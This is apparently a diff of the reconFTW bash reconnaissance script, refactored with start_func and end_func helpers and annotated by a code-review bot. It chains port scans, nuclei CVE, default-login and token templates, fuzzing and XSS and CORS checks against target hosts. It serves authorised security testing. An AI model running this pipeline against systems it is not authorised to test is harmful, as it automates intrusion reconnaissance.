@@ -575,23 +520,12 @@ function webprobe_simple(){ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} ${bgreen} Web Probe ${reset}\n\n" - printf "${yellow} Running : Http probing non standard ports${reset}\n\n" - start=`date +%s` + start_func "Http probing non standard ports" cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads 150 -timeout 10 -silent -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${bred}\n Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR - fi - printf "${bblue}\n Web Probe Finished\n" - printf "${bblue} Results are saved in webs/webs_uncommon_ports.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}" good + eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR + end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} else 
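Review bot: `notification "Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}" good` references `${runtime}` after this hunk removed the `end=`/`getElapsedTime` lines that computed it, so the value is stale or empty; drop `in ${runtime}` and let end_func report elapsed time. This probe also filters with `grep ".$domain"` without the `$` anchor that webprobe_simple uses, so a host such as `example.com.evil.net:8080` passes; use the same anchored, escaped pattern. The old code printed webs_uncommon_ports.txt only when NUMOFLINES was above zero, whereas the new `eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR` runs every time.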
if [ "$WEBPROBEFULL" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -604,18 +538,10 @@ function webprobe_full(){ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} ${bgreen} Web Screenshot ${reset}\n\n" - start=`date +%s` + start_func "Web Screenshots" eval gowitness file -f webs/webs.txt --disable-db --disable-logging $DEBUG_ERROR eval gowitness file -f webs/webs_uncommon_ports.txt --disable-db --disable-logging $DEBUG_ERROR - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Web Screenshot Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in screenshots folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -632,9 +558,7 @@ function screenshot(){ function favicon(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FAVICON" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} FavIcon Hash Extraction ${reset}\n\n" - start=`date +%s` + start_func "Favicon Ip Lookup" cd $tools/fav-up eval python3 favUp.py -w $domain -sc -o favicontest.json $DEBUG_STD if [ -f "favicontest.json" ] 
@@ -645,13 +569,7 @@ function favicon(){
 eval mv favicontest.txt $dir/hosts/favicontest.txt $DEBUG_ERROR
 eval rm favicontest.json $DEBUG_ERROR
 fi
- cd $dir && touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n FavIcon Hash Extraction Finished in ${runtime}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in hosts/favicontest.txt${reset}\n"
- printf "${bgreen}#######################################################################\n\n"
+ end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]}
 else
 if [ "$FAVICON" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
@@ -664,10 +582,7 @@ function favicon(){
 function portscan(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PORTSCANNER" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} Port Scan ${reset}\n\n"
- start=`date +%s`
-
+ start_func "Port scan"
 for sub in $(cat subdomains/subdomains.txt); do
 echo "$sub $(dig +short a $sub | tail -n1)" | anew -q hosts/subdomains_ips.txt
 done
@@ -679,6 +594,7 @@ function portscan(){
 printf "${bblue}\n Resolved IP addresses (No WAF) ${reset}\n\n";
 eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort
 
+ printf "${bblue}\n Scanning ports... ${reset}\n\n";
 if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "${domain}_portscan_passive.txt" ]
 then
 for sub in $(cat .tmp/ips_nowaf.txt); do
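Review bot: The removed line `cd $dir && touch $called_fn_dir/.${FUNCNAME[0]}` was also the `cd $dir` that returns from `$tools/fav-up` (entered earlier in favicon), and its replacement `end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]}` does not change directory, so unless end_func does a cd of its own the shell stays in `$tools/fav-up` and the next step, portscan, reads `subdomains/subdomains.txt` and writes `hosts/subdomains_ips.txt` relative to the wrong directory. Reinstate `cd "$dir"` before the end_func call. In portscan, `for sub in $(cat subdomains/subdomains.txt)` should be a `while IFS= read -r sub` loop, and `dig +short a $sub` deserves quoting.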
@@ -691,14 +607,7 @@ function portscan(){ eval nmap --top-ports 1000 -sV -n --max-retries 2 -iL .tmp/ips_nowaf.txt -oN hosts/portscan_active.txt $DEBUG_STD fi - #eval cat portscan.txt $DEBUG_ERROR - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Port scan Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in portscan_[passive|active].txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} else if [ "$PORTSCANNER" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
@@ -716,20 +625,12 @@ function portscan(){
 function waf_checks(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WAF_DETECTION" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} ${bgreen} Detecting WAF in websites ${reset}\n\n"
- start=`date +%s`
+ start_func "Website's WAF detection"
 wafw00f -i webs/webs.txt -o .tmp/wafs.txt &>/dev/null
 cat .tmp/wafs.txt | sed -e 's/^[ \t]*//' -e 's/ \+ /\t/g' -e '/(None)/d' | tr -s "\t" ";" > webs/webs_wafs.txt
 NUMOFLINES=$(eval cat webs/webs_wafs.txt $DEBUG_ERROR | wc -l)
- text="${bblue}\n ${NUMOFLINES} websites protected by waf ${reset}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- printf "${bblue}\n WAF Detecion Finished in ${runtime}\n"
- printf "${bblue} Results are saved in screenshots folder${reset}\n"
- printf "${bgreen}#######################################################################\n\n"
+ notification "${NUMOFLINES} websites protected by waf" info
+ end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]}
 else
 if [ "$WAF" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
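Review bot: The skip branch still tests `if [ "$WAF" = false ]`, but the switch that gates this function is `WAF_DETECTION` (see the cfg hunk and the `if` at the top of waf_checks), so with WAF detection disabled the "already processed" message is printed instead of "skipped in this mode"; this is the same mismatch the commit fixes in github_dorks (`$DORKS` to `$GITHUB_DORKS`) but misses here. Change it to `if [ "$WAF_DETECTION" = false ]; then`. Separately, `wafw00f ... &>/dev/null` hides all failures, so an empty webs_wafs.txt is indistinguishable from "no WAF found".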
@@ -742,36 +643,29 @@ function waf_checks(){
 function nuclei_check(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$NUCLEICHECK" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} Template Scanning with Nuclei ${reset}\n\n"
- start=`date +%s`
+ start_func "Templates based web scanner"
 eval nuclei -update-templates $DEBUG_STD
 mkdir -p nuclei_output
 printf "${yellow} Running : Nuclei Technologies${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt
 printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt
 printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -o nuclei_output/exposures.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -o nuclei_output/exposures.txt
 printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -o nuclei_output/cves.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -o nuclei_output/cves.txt
 printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -o nuclei_output/default_creds.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -o nuclei_output/default_creds.txt
 printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -o nuclei_output/dns.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -o nuclei_output/dns.txt
 printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -o nuclei_output/panels.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -o nuclei_output/panels.txt
 printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -o nuclei_output/misconfigurations.txt;
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -o nuclei_output/misconfigurations.txt
 printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n"
- cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -o nuclei_output/vulnerabilities.txt && touch $called_fn_dir/.${FUNCNAME[0]};
+ cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -o nuclei_output/vulnerabilities.txt
 printf "\n\n"
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n Nuclei Scan Finished in ${runtime}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in nuclei_output folder ${reset}\n"
- printf "${bgreen}#######################################################################\n\n"
+ end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]}
 else
 if [ "$NUCLEICHECK" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
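Review bot: `eval nuclei -update-templates $DEBUG_STD` runs unconditionally at the top of every nuclei_check, so each scan pulls the newest community templates over the network and immediately executes them against the target; results are not reproducible between runs and the template set is never pinned or reviewed. Make the update opt-in behind a reconftw.cfg switch (for example a `NUCLEI_UPDATE` flag checked as `[ "$NUCLEI_UPDATE" = true ] && eval nuclei -update-templates $DEBUG_STD`) and record the template version in nuclei_output. The commit also removed the `&& touch $called_fn_dir/.${FUNCNAME[0]}` from the vulnerabilities line, so if end_func writes the marker unconditionally the function is marked done even when nuclei fails; and `~/nuclei-templates/` is hard-coded nine times where a single variable would do.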
@@ -784,10 +678,7 @@ function nuclei_check(){ function fuzz(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FUZZ" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Directory Fuzzing ${reset}\n" - printf "${yellow}\n\n Fuzzing subdomains with ${fuzz_wordlist}${reset}\n\n" - start=`date +%s` + start_func "Web directory fuzzing" mkdir -p $dir/fuzzing for sub in $(cat webs/webs.txt); do printf "${yellow}\n\n Running: Fuzzing in ${sub}${reset}\n" @@ -796,13 +687,7 @@ function fuzz(){ eval cat $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR | jq '[.results[]|{status: .status, length: .length, url: .url}]' | grep -oP "status\":\s(\d{3})|length\":\s(\d{1,7})|url\":\s\"(http[s]?:\/\/.*?)\"" | paste -d' ' - - - | awk '{print $2" "$4" "$6}' | sed 's/\"//g' | sort |anew -q $dir/fuzzing/${sub_out}.txt eval rm $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR done - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Directory Fuzzing Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in fuzzing/*subdomain*.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} else if [ "$FUZZ" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
@@ -815,9 +700,7 @@ function fuzz(){ function cms_scanner(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CMS_SCANNER" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} CMS Scanner ${reset}\n" - start=`date +%s` + start_func "CMS Scanner" mkdir -p $dir/cms && rm -rf $dir/cms/* tr '\n' ',' < webs/webs.txt > .tmp/cms.txt eval python3 $tools/CMSeeK/cmseek.py -l .tmp/cms.txt --batch -r $DEBUG_STD @@ -831,13 +714,7 @@ function cms_scanner(){ mv -f $tools/CMSeeK/Result/${sub_out} $dir/cms/ fi done - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n CMS Scanner finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in cms/*subdomain* folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in cms/*subdomain* folder" else if [ "$CMS_SCANNER" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -850,9 +727,7 @@ function cms_scanner(){ function params(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PARAMS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Parameter Discovery ${reset}\n" - start=`date +%s` + start_func "Parameter Discovery" printf "${yellow}\n\n Running : Searching params with paramspider${reset}\n" cat webs/webs.txt | sed -r "s/https?:\/\///" | anew -q .tmp/probed_nohttp.txt interlace -tL .tmp/probed_nohttp.txt -threads 10 -c "python3 $tools/ParamSpider/paramspider.py -d _target_ -l high -q --exclude eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt,js" &>/dev/null 
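Review bot: In the second hunk on this line (`@@ -831,13 +714,7 @@`), `end_func "Results are saved in cms/*subdomain* folder"` is missing the `${FUNCNAME[0]}` argument every other converted function passes, so inside `end_func` the `touch $called_fn_dir/.${2}` becomes `touch $called_fn_dir/.` (the directory itself) and the `.cms_scanner` marker is never written; the "already processed" skip therefore never applies to the CMS scan, and the notification reads ` Finished in …` with an empty function name. Change it to `end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]}`. The `cms_scanner` body starts in the previous hunk and its else branch continues past this one.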
@@ -861,22 +736,17 @@ function params(){ eval rm -rf output/ $DEBUG_ERROR if [ "$DEEP" = true ] ; then printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" - eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD else if [[ $(cat .tmp/param_tmp.txt | wc -l) -le 50 ]] then printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" - eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD else - cp .tmp/param_tmp.txt webs/param.txt && touch $called_fn_dir/.${FUNCNAME[0]} + cp .tmp/param_tmp.txt webs/param.txt fi fi - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Parameter Discovery Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in webs/param.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} else if [ "$PARAMS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -887,11 +757,9 @@ function params(){ } function urlchecks(){ - if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_CHECK" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} URL Extraction ${reset}\n\n" - start=`date +%s` + start_func "URL Extraction" mkdir -p js cat webs/webs.txt | waybackurls | anew -q .tmp/url_extract_tmp.txt cat webs/webs.txt | gau | anew -q .tmp/url_extract_tmp.txt 
@@ -908,17 +776,8 @@ function urlchecks(){ cat .tmp/url_extract_tmp.txt | grep "${domain}" | egrep -i "\.(js)" | anew -q js/url_extract_js.txt eval uddup -u .tmp/url_extract_tmp2.txt -o .tmp/url_extract_uddup.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]}; - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n URL Extraction Finished\n" - printf "${text}" && printf "${text}" | $NOTIFY - if [ "$NUMOFLINES" -gt 0 ]; then - text="${bblue}\n ${NUMOFLINES} new urls in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi - printf "${bblue} Results are saved in webs/url_extract.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "${NUMOFLINES} new urls in ${runtime}" good + end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -927,9 +786,7 @@ function urlchecks(){ function url_gf(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_GF" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Vulnerable Pattern Search ${reset}\n\n" - start=`date +%s` + start_func "Vulnerable Pattern Search" mkdir -p gf gf xss webs/url_extract.txt | anew -q gf/xss.txt gf ssti webs/url_extract.txt | anew -q gf/ssti.txt 
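Review bot: In `urlchecks`, `notification "${NUMOFLINES} new urls in ${runtime}" good` runs before `end_func`, but `runtime` is only set by `getElapsedTime` inside `end_func`, so the message reports the elapsed time of whatever function ran previously (or nothing at all on the first run); move the notification after `end_func` or compute the time first. The old `if [ "$NUMOFLINES" -gt 0 ]` guard is also gone, so a "0 new urls" message is pushed through `$NOTIFY` on every run. Separately, the previous hunk added `[ "$URL_CHECK" = true ]` to the condition, but the else branch kept here still prints only "already processed", unlike the other functions that distinguish the `= false` case; add the same `if [ "$URL_CHECK" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"` branch.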
@@ -940,13 +797,7 @@ function url_gf(){ gf potential webs/url_extract.txt | cut -d ':' -f3-5 |anew -q gf/potential.txt cat webs/url_extract.txt | unfurl -u format %s://%d%p | anew -q gf/endpoints.txt gf lfi webs/url_extract.txt | anew -q gf/lfi.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Vulnerable Pattern Search Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in gf folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in gf folder" ${FUNCNAME[0]} else if [ "$URL_GF" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -959,9 +810,7 @@ function url_gf(){ function jschecks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$JSCHECKS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Javascript Scan ${reset}\n\n" - start=`date +%s` + start_func "Javascript Scan" printf "${yellow} Running : Fetching Urls 1/5${reset}\n" cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt 
@@ -973,13 +822,7 @@ function jschecks(){ cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" cat js/js_livelinks.txt | eval python3 $tools/getjswords.py $DEBUG_ERROR | anew -q webs/dict_words.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Javascript Scan Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in js folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in js folder" ${FUNCNAME[0]} else if [ "$JSCHECKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -992,14 +835,13 @@ function jschecks(){ function wordlist_gen(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WORDLIST" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Wordlist generation ${reset}\n\n" - start=`date +%s` + start_func "Wordlist generation" cat .tmp/url_extract_tmp.txt | unfurl -u keys | sed 's/[][]//g' | sed 's/[#]//g' | sed 's/[}{]//g' | anew -q webs/dict_words.txt cat .tmp/url_extract_tmp.txt | unfurl -u path | anew -q webs/dict_paths.txt touch $called_fn_dir/.${FUNCNAME[0]} - text="${bblue}\n Wordlists Generated\n" - printf "${text}" && printf "${text}" | $NOTIFY + end=`date +%s` + getElapsedTime $start $end + notification "Wordlists Generated in ${runtime}" info printf "${bblue} Results are saved in webs/dict_[words|paths].txt${reset}\n" printf "${bgreen}#######################################################################\n\n" else 
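Review bot: In the second hunk on this line, `wordlist_gen` now opens with `start_func`, which calls `start_spinner`, but it keeps its hand-rolled tail (`touch`, `end=…`, `getElapsedTime`, `notification`) and never calls `stop_spinner` or `end_func`, so the background spinner from this function keeps overwriting the terminal until the script exits, and the next `start_func` overwrites `_sp_pid` and orphans it. Replace the tail with `end_func "Results are saved in webs/dict_[words|paths].txt" ${FUNCNAME[0]}` like the other functions, or at minimum add `stop_spinner` before the notification. The function's closing lines are outside the hunk.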
@@ -1017,21 +859,12 @@ function wordlist_gen(){ function brokenLinks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BROKENLINKS" = true ] ; then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Broken links checks ${reset}\n\n" - start=`date +%s` - gospider -S webs/webs.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep -v ".$domain" | httpx -status-code -follow-redirects -timeout 15 -silent -no-color | grep '\[404\]' | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + start_func "Broken links checks" + interlace -tL webs/webs.txt -threads 10 -c "wget --spider -r -nd -nv -H -l 1 -w 1 --no-check-certificate -U 'Mozilla' -o _output_/_cleantarget__brokenLinks.tmp _target_" -o .tmp &>/dev/null + cat .tmp/*_brokenLinks.tmp | grep "^http" | grep -v ':$' | anew -q .tmp/brokenLinks_total.txt NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | cut -d ' ' -f2 | anew webs/brokenLinks.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${bred}\n ${NUMOFLINES} new broken links found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi - printf "${bblue}\n Broken links checks Finished in ${runtime}\n" - printf "${bblue} Results are saved in webs/brokenLinks.txt ${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "${NUMOFLINES} new broken links found in ${runtime}" good + end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} else if [ "$BROKENLINKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
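Review bot: `notification "${NUMOFLINES} new broken links found in ${runtime}" good` reads `runtime` before `end_func` computes it, so the reported duration belongs to a previous function; emit the notification after `end_func` or call `getElapsedTime` first, and restore the `NUMOFLINES -gt 0` guard so a zero-result message is not pushed to `$NOTIFY` every run. On the new `wget` line, `--no-check-certificate` accepts any TLS certificate and `-r -H -l 1` follows links onto third-party hosts, which may be out of scope for an engagement; a one-line comment stating both is warranted, e.g. `# spider one level incl. external hosts; TLS errors ignored on purpose`. The `grep "^http" | grep -v ':$'` filter presumably keys on wget's `-nv` log format, which is not documented here; note the expected line shape next to it so a wget version change is caught.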
@@ -1044,9 +877,7 @@ function brokenLinks(){ function xss(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$XSS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} XSS Analysis ${reset}\n\n" - start=`date +%s` + start_func "XSS Analysis" cat gf/xss.txt | qsreplace FUZZ | Gxss -c 100 -p Xss | anew -q .tmp/xss_reflected.txt if [ "$DEEP" = true ] ; then if [ -n "$XSS_SERVER" ]; then @@ -1070,12 +901,7 @@ function xss(){ printf "${bred} Skipping XSS: Too Much URLs to test, try with --deep flag${reset}\n" fi fi - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n XSS Analysis Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/xss.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} else if [ "$XSS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
@@ -1088,17 +914,10 @@ function xss(){
 function cors(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CORS" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} CORS Scan ${reset}\n\n"
- start=`date +%s`
+ start_func "CORS Scan"
 eval python3 $tools/Corsy/corsy.py -i webs/webs.txt > webs/cors.txt $DEBUG_STD
 eval cat webs/cors.txt $DEBUG_ERROR && touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n CORS Scan Finished in ${runtime}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in webs/cors.txt ${reset}\n"
- printf "${bgreen}#######################################################################\n"
